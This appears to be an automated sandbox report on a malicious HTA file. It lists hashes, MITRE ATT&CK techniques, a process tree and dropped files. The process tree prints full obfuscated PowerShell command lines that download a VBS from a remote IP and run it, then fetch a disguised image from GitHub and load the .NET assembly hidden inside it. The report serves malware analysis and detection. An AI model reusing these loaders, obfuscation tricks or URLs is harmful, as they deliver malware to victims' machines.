8fbf6165b0751a47bf9842011e82c4a7715cc879fd7272b45ab549df6e813e46

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
14-10-2024 09:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

na.hta
Size

163KB
MD5

52bb72daa6c16c09d4298bd59e12b7d9
SHA1

2e4aef7df584acaadb5a6e555d6e2f40ae12b6f1
SHA256

8fbf6165b0751a47bf9842011e82c4a7715cc879fd7272b45ab549df6e813e46
SHA512

1a6a1c54ceed1d004e32504bb473d2525dcff1974d8618af871252e4da7f3992ca87acc935a74f78cd6c14f172142ccfeee9bcb47104ea50a704fe37750d4ee4
SSDEEP

48:7oa+awjz7eWLB23EfAq6kfAKV6/HQ2UBW1++izpyHBfHLPy3JofufAYfAkhjQ/od:Ea+n7QbzVsdi9yOPtksVKLSAT

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	1812	pOwerSHelL.EXe
6	396	powershell.exe
7	396	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2992	powershell.exe
396	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
1812	pOwerSHelL.EXe
2536	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
5	raw.githubusercontent.com
6	raw.githubusercontent.com
7	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOwerSHelL.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1812	pOwerSHelL.EXe
2536	powershell.exe
1812	pOwerSHelL.EXe
1812	pOwerSHelL.EXe
2992	powershell.exe
396	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1812	pOwerSHelL.EXe
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeDebugPrivilege	2992	powershell.exe
Token: SeDebugPrivilege	396	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2512 wrote to memory of 1812	2512	mshta.exe	30
PID 2512 wrote to memory of 1812	2512	mshta.exe	30
PID 2512 wrote to memory of 1812	2512	mshta.exe	30
PID 2512 wrote to memory of 1812	2512	mshta.exe	30
PID 1812 wrote to memory of 2536	1812	pOwerSHelL.EXe	32
PID 1812 wrote to memory of 2536	1812	pOwerSHelL.EXe	32
PID 1812 wrote to memory of 2536	1812	pOwerSHelL.EXe	32
PID 1812 wrote to memory of 2536	1812	pOwerSHelL.EXe	32
PID 1812 wrote to memory of 2756	1812	pOwerSHelL.EXe	33
PID 1812 wrote to memory of 2756	1812	pOwerSHelL.EXe	33
PID 1812 wrote to memory of 2756	1812	pOwerSHelL.EXe	33
PID 1812 wrote to memory of 2756	1812	pOwerSHelL.EXe	33
PID 2756 wrote to memory of 2836	2756	csc.exe	34
PID 2756 wrote to memory of 2836	2756	csc.exe	34
PID 2756 wrote to memory of 2836	2756	csc.exe	34
PID 2756 wrote to memory of 2836	2756	csc.exe	34
PID 1812 wrote to memory of 2632	1812	pOwerSHelL.EXe	36
PID 1812 wrote to memory of 2632	1812	pOwerSHelL.EXe	36
PID 1812 wrote to memory of 2632	1812	pOwerSHelL.EXe	36
PID 1812 wrote to memory of 2632	1812	pOwerSHelL.EXe	36
PID 2632 wrote to memory of 2992	2632	WScript.exe	37
PID 2632 wrote to memory of 2992	2632	WScript.exe	37
PID 2632 wrote to memory of 2992	2632	WScript.exe	37
PID 2632 wrote to memory of 2992	2632	WScript.exe	37
PID 2992 wrote to memory of 396	2992	powershell.exe	39
PID 2992 wrote to memory of 396	2992	powershell.exe	39
PID 2992 wrote to memory of 396	2992	powershell.exe	39
PID 2992 wrote to memory of 396	2992	powershell.exe	39

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\na.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2512
- C:\Windows\SysWOW64\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe
  "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1812
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2536
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\unvyzzuh.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2756
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAC86.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAC85.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2836
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2632
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2992
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:396

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESAC86.tmp

Filesize
1KB

MD5
fa63abc52236d336e931e358c52edc84

SHA1
edee3b0de72c76a914582ee470f8d509c0affbcc

SHA256
20e2b49f034d850e353433108df4c985e37e31851dd1c39e5c63cead55f9addd

SHA512
01293d83d9e56be5bd794016b71f5bbceb0d606795fea76b896c9562304a5ad04678fbf0277706608ba45d923723fff1eec15dfcc642bed9cca7f4bacd1a4e39

Download Submit
C:\Users\Admin\AppData\Local\Temp\unvyzzuh.dll

Filesize
3KB

MD5
54322e01f878c856038ab4d5d8b091fd

SHA1
079a4ff281a56836dd31c5efb46e02620e618a9e

SHA256
8152fd2f4ee0dbba0395af80ee27ca10a74523027535af530c0e6d7d36b03cd3

SHA512
a8257075bd924c2f24b22816e417d94daf826d65dc2fd865b852f7108858a96dafacbddb554411fad96648138d2810e09c30ea73ca7601bb5120bf9e19240a86

Download Submit
C:\Users\Admin\AppData\Local\Temp\unvyzzuh.pdb

Filesize
7KB

MD5
07df75ccd5325752518b80b5025525c3

SHA1
6b63b1b36d6a58709e23fc1f029a3289cd79aed2

SHA256
65835e4d8d1619b93ffc37de82e15128fe5d926a1e0276cfb47ccb9aabf23835

SHA512
d6bafd9359e56b4d12f7228263a4cbd67ad9d1b69773eaf9994d067f2a9b991c2ca5f650bea7ae5477c195c78ff95b62f7df6681c7c79e6209a5dba25c2336df

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
7ec7d343b1e4d5126c47d09f8722267a

SHA1
935128c8b583af1c4f38303ad26d4f98348a809e

SHA256
09e48410618c9795b7b406e31eafbb626985f099cc931a82f2398977dcef34f9

SHA512
892b48968ffea5dbbfd832fb3caa5521d05f8becfc7e86266bbec598923bd89438905de825a47fa83eb71c06cda8036341c4c1c3d93c416b57465460f93cc181

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS

Filesize
191KB

MD5
5a71149a9c997cdcb94f1a84860417f7

SHA1
9d80f853425ae99d844a70cebaa59aee73c537d1

SHA256
ff6b47d315645fddc632876ae60a1a33a3e9138ceef8a073d2fe8779208f7d8c

SHA512
448d914aa714c3deab84218beda6a3e94a9a5b8a5d912178f72a2ea82c73ad6ddb86a8e3443785fdce8d9fd876c5df7c26cd878dfa33f432e38ad62ff0e91c1b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCAC85.tmp

Filesize
652B

MD5
13353eea5f930494dfe0a61a59dd96cb

SHA1
744ed0ea3ffdf9a1b7f2bb16e1241ecdaee01b41

SHA256
ea9d793a9773809be5a6a3ffc7d50d9ff9e6a6606fcbb05d0c3e948260565822

SHA512
7211c3038d1b8d9517c5e7cf1f98199af89ebd0a827a16311846f99bab2b3e1941bee635b7e23197c4e743f8bdc50dcde04beeb99fa055ca602cb3b8a45f78c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\unvyzzuh.0.cs

Filesize
475B

MD5
cf949a7e29735ad6b8a09c0cc0beae97

SHA1
dc92e9e10f38aeab463c00e9d75c8dbf2079c789

SHA256
445f4cadd6d07292e03d69e62fac1ab63ad9e3ac760e46d367bea04a4604b7b4

SHA512
29c63c01aed8621de822517bacfe90130ef54c77a73edfc2036df8a1cd182b1f6a4acfa9742b81f7276a99cf01d98f012a5a8c06f87b4c1620f92d2cceb36041

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\unvyzzuh.cmdline

Filesize
309B

MD5
31496b993a63e767ddeb7d7a60b9b599

SHA1
d195dd978d2de168581421ac3e7a33532c1020dd

SHA256
12ed7966e5d7ea55e5680efc9fa6ab7fecfc7e134c2d3c8080d1afe86a95af27

SHA512
d8f5d228aca2058fac0c25e784450df1c02d101ca3ac8adbdb3eb9858eda94c36ca9d8f0b1000b76cc63543e95d3924a44b4f9837b158e4873a58f595ef1897a

Download Submit